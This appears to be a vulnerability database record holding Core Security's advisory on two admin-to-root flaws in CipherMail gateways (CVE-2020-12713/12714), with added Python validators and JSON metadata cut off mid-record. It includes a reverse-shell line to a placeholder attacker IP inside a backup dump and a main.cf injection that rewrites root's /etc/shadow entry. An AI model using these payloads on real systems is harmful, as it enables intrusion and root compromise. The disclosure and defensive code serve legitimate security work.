VAR-202006-0395

Vulnerability from variot - Updated: 2023-12-18 13:33

An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. CipherMail Gateway and Webmail Messenger contain a privilege management vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). CipherMail Webmail Messenger is a webmail add-on for the CipherMail encryption gateway. An attacker could exploit this vulnerability to elevate privileges to root. An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client.

CipherMail Multiple Vulnerabilities

  1. Advisory Information

Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-0008
Advisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities
Date published: 2020-05-28
Date of last update: 2020-05-28
Vendors contacted: CipherMail
Release mode: Coordinated release

  2. Vulnerability Information

Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-12713, CVE-2020-12714

  3. Vulnerability Description

CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]

Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance that would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privileged commands on the operating system.

  4. Vulnerable Packages

    CipherMail Community Virtual Appliance version 4.6.2.

Other products and versions might be affected, but have not yet been tested.

  5. Vendor Information, Solutions, and Workarounds

The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2

Patch instructions for older releases are also available.

  6. Credits

This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team.

  7. Technical Description / Proof of Concept Code

CipherMail Community Virtual Appliance is an open source virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system.

7.1 Remote Command Execution Via Backup Restore

[CVE-2020-12713] The CipherMail Web Management console provides a system backup function, accessible only to the administrator role, for backing up or restoring the system settings. This capability is affected by a remote code execution vulnerability.

The following proof of concept demonstrates the vulnerability:

  1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files.

  2. The obtained file should then be decompressed. The word system, followed by the command to be executed, can then be added at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:

    -- MySQL dump 10.16  Distrib 10.2.21-MariaDB, for Linux (x86_64)
    --
    -- Host: localhost    Database: djigzo
    -- ------------------------------------------------------
    -- Server version	10.2.21-MariaDB
    [...]
    --
    -- Dumping data for table `cm_users`
    --

    LOCK TABLES `cm_users` WRITE;
    /*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;
    INSERT INTO `cm_users` VALUES (1,'susucutrule@mailinator.com',5);
    /*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;
    UNLOCK TABLES;
    /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

    /*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
    /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
    /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
    /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
    /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
    /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
    /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

    system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1
    -- Dump completed on 2019-03-28 18:48:05

  3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console.

  4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server.

7.2 Configuration File Injection Leading to Code Execution as Root

[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s main.cf configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file.

The following proof of concept demonstrates the vulnerability:

The next four lines should be added in order to replace the root password in the system:

    [main.cf Postfix configuration file]
    […]
            always_bcc = johnny@test.com
            multi_instance_enable=yes
            multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow
            multi_instance_directories=/tmp
    […]

After the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed to by multi_instance_wrapper is executed.

In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command:

    $ mkpasswd -m des
    Password: pentest
    KoVhDRK7oesZg

As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest.

It is now possible to establish an SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set.
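The following Python is an added example, not code from the advisory or from CipherMail. It shows input checks for the two injection points above: `check_dump` applies a statement allowlist to an uploaded SQL dump before restore (7.1), `always_bcc_line` accepts only a single address for the BCC field, and `unexpected_parameters` audits an existing main.cf (7.2). The allowlist, the `EXPECTED` baseline and the sample inputs are assumptions constructed for illustration.

```python
import re

# 7.1: statement allowlist for an uploaded SQL dump.
# Assumption: a settings dump needs only these statement types.
ALLOWED_SQL = {"ALTER", "CREATE", "DROP", "INSERT", "LOCK", "SET", "UNLOCK", "USE"}

TOKEN = re.compile(r"""
    (?P<literal>'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|`[^`]*`)  # quoted text
  | (?P<comment>--(?=\s|$)[^\n]*)                              # line comment
  | (?P<end>;)                                                 # terminator
  | (?P<backslash>\\)                                          # outside a literal
  | (?P<other>[^'"`;\\-]+|.)                                   # anything else
""", re.X | re.S | re.M)


def sql_statements(sql):
    """Yield (line_no, text, bare_backslash) for every statement, including an
    unterminated fragment left at the end of the file."""
    parts, begin, bare = [], None, False
    for m in TOKEN.finditer(sql):
        kind, tok = m.lastgroup, m.group()
        if kind == "comment":
            continue
        if kind != "end":
            if begin is None and tok.strip():
                lead = len(tok) - len(tok.lstrip())
                begin = sql.count("\n", 0, m.start() + lead) + 1
            bare = bare or kind == "backslash"
            parts.append(tok)
            continue
        if begin is not None:
            yield begin, "".join(parts).strip(), bare
        parts, begin, bare = [], None, False
    if begin is not None:
        yield begin, "".join(parts).strip(), bare


def check_dump(sql):
    """Return (line_no, reason) findings; an empty list means the dump passed."""
    findings = []
    for line_no, stmt, bare in sql_statements(sql):
        # A versioned comment such as /*!40101 SET ... */ executes its body.
        body = re.sub(r"^/\*!\d*\s*", "", stmt)
        word = re.match(r"[A-Za-z]+", body)
        if not word or word.group().upper() not in ALLOWED_SQL:
            findings.append((line_no, "statement type not allowed"))
        elif bare:
            findings.append((line_no, "backslash outside a quoted literal"))
    return findings


# 7.2: the BCC field must be exactly one address, never raw main.cf text.
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def always_bcc_line(value):
    """Return the one main.cf line for a validated address, or raise ValueError."""
    # fullmatch() leaves no room for a newline, '=' or whitespace, so the value
    # cannot start a second "name = value" line in the file.
    if not ADDRESS.fullmatch(value):
        raise ValueError("BCC address rejected")
    return f"always_bcc = {value}"


def unexpected_parameters(main_cf, expected):
    """List parameter names set in main.cf text that are absent from `expected`."""
    found = []
    for line in main_cf.splitlines():
        if not line.strip() or line[0].isspace() or line.startswith("#"):
            continue  # blank, continuation of the previous line, or comment
        found.append(line.split("=", 1)[0].strip())
    return [name for name in found if name not in expected]


# Constructed sample modelled on the dump in 7.1; "[command]" is a placeholder.
CLEAN_DUMP = """\
-- Dumping data for table `cm_users`
--
LOCK TABLES `cm_users` WRITE;
/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;
INSERT INTO `cm_users` VALUES (1,'user@example.com',5);
/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
"""
TAMPERED_DUMP = CLEAN_DUMP + "\nsystem [command]\n-- Dump completed on 2019-03-28 18:48:05\n"
# Constructed sample: the field value from 7.2 with the command replaced by a placeholder.
INJECTED_BCC = ("johnny@test.com\nmulti_instance_enable=yes\n"
                "multi_instance_wrapper=[command]\nmulti_instance_directories=/tmp")
# Hypothetical baseline of parameters the appliance is expected to set.
EXPECTED = {"myhostname", "relayhost", "always_bcc"}

if __name__ == "__main__":
    print(check_dump(TAMPERED_DUMP))
    print(unexpected_parameters("always_bcc = " + INJECTED_BCC, EXPECTED))
```

Both checks fail closed: a dump containing anything other than the allowlisted statement types is refused, and the BCC value is rebuilt from a validated address instead of being copied into the file.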

  8. Report Timeline

2020-04-07 - Vulnerability discovered by CoreLabs.

2020-04-30 - First contact made with the vendor.

2020-04-30 - Answer received and advisory draft provided to CipherMail.

2020-04-30 - Vulnerabilities recognized by the vendor.

2020-05-21 - CVEs requested and received from Mitre.

2020-05-28 - Fix and release changes published by vendor.

2020-05-28 - Advisory published.

  9. References

[1] https://www.ciphermail.com/

[2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html

  10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.

  11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

  12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202006-0395",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "webmail messenger",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "ciphermail",
        "version": "1.1.1"
      },
      {
        "model": "webmail messenger",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ciphermail",
        "version": "3.1.1-0"
      },
      {
        "model": "gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "ciphermail",
        "version": "1.0.1"
      },
      {
        "model": "gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ciphermail",
        "version": "4.7.1-0"
      },
      {
        "model": "gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ciphermail",
        "version": "1.0.1 \u304b\u3089 4.7.1-0"
      },
      {
        "model": "webmail messenger",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ciphermail",
        "version": "1.1.1 \u304b\u3089 3.1.1-0"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ciphermail:gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.7.1-0",
                "versionStartIncluding": "1.0.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ciphermail:webmail_messenger:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.1.1-0",
                "versionStartIncluding": "1.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Core Security Technologies, Fernando Catoira, Ivan Koiffman, Fernando Diaz",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-12713",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-006804",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-165419",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-165420",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-006804",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-12713",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-006804",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202006-822",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-165419",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-165420",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. CipherMail Gateway and Webmail Messenger Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. CipherMail Webmail Messenger is a CipherMail encrypted gateway\u0027s Webmail Add-ons. An attacker could exploit this vulnerability to elevate privileges to root . An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client. CipherMail Multiple Vulnerabilities\n\n1. Advisory Information\n\nTitle: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities     \nAdvisory ID: CORE-2020-0008\nAdvisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities\nDate published: 2020-05-28\nDate of last update: 2020-05-28\nVendors contacted: CipherMail\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2020-12713 , CVE-2020-12714\n\n3. Vulnerability Description\n\nCipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools.  
CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]\n\nTwo vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system. \n\n4. Vulnerable Packages\n\n    CipherMail Community Virtual Appliance version 4.6.2. \n\nOther products and versions might be affected, but have not yet been tested. \n\n5. Vendor Information, Solutions, and Workarounds\n\nThe following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2\n\nPatch instructions for older releases are also available. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Iv\u00e1n Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services. \n\nThe publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team. \n\n7. Technical Description / Proof of Concept Code\n\nCipherMail Community Virtual Appliance is an open souce virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization\u0027s network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services. \n\nMultiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system. 
\n7.1 Remote Command Execution Via Backup Restore\n\n[CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator\u0027s role  which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability. \n\nThe following proof of concept demonstrates the vulnerability:\n\n1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files. \n\n2. The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:\n\n-- MySQL dump 10.16  Distrib 10.2.21-MariaDB, for Linux (x86_64)\n--\n-- Host: localhost    Database: djigzo\n-- ------------------------------------------------------\n-- Server version\t10.2.21-MariaDB\n[...]\n--\n-- Dumping data for table `cm_users`\n--\n\nLOCK TABLES `cm_users` WRITE;\n/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;\nINSERT INTO `cm_users` VALUES (1,\u0027susucutrule@mailinator.com\u0027,5);\n/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;\nUNLOCK TABLES;\n/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n\n/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n\nsystem bash -i \u003e\u0026 /dev/tcp/[Attacker IP]/[Attacker Port] 0\u003e\u00261\n-- Dump completed on 2019-03-28 18:48:05\n\n3. 
It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console. \n\n4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server. \n7.2 Configuration File Injection Leading to Code Execution as Root\n\n[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator\u0027s role to manage Postfix. It is possible to edit Postfix\u2019s main.cf configuration file within the CipherMail Web Management console and add a \"BCC Address for all Messages\". This configuration parameter is written verbatim to the appliance\u0027s Postfix main.cf configuration file. \n\nThe following proof of concept demonstrates the vulnerability:\n\nThe next four lines should be added in order to replace the root password in the system:\n\n[main.cf Postfix configuration file]\n[\u2026]\n        always_bcc = johnny@test.com\n        multi_instance_enable=yes\n        multi_instance_wrapper=sed -i /root:/c\\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow\n        multi_instance_directories=/tmp \n[\u2026]     \n\nAfter the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed. \n\nIn this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including \"\u003c\", \"\u003e\", \"|\", among others). 
To generate a password in DES using bash, we first executed the following command:\n\n$ mkpasswd -m des\n Password: pentest\n KoVhDRK7oesZg\n\nAs shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest. \n\nIt is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set. \n\n8. Report Timeline\n\n2020-04-07 - Vulnerability discovered by CoreLabs. \n\n2020-04-30 - First contact made with the vendor. \n\n2020-04-30 - Answer received and advisory draft provided to CipherMail. \n\n2020-04-30 - Vulnerabilities recognized by the vendor. \n\n2020-05-21 - CVEs requested and received from Mitre. \n\n2020-05-28 - Fix and release changes published by vendor. \n\n2020-05-28 - Advisory published. \n\n9. References\n\n[1] https://www.ciphermail.com/\n\n[2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html\n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.  \n11. 
About Core Security, A HelpSystems Company\n\nCore Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity \u0026 access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com. \n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com. \n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "PACKETSTORM",
        "id": "158001"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-12713",
        "trust": 2.7
      },
      {
        "db": "PACKETSTORM",
        "id": "158001",
        "trust": 1.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-165419",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
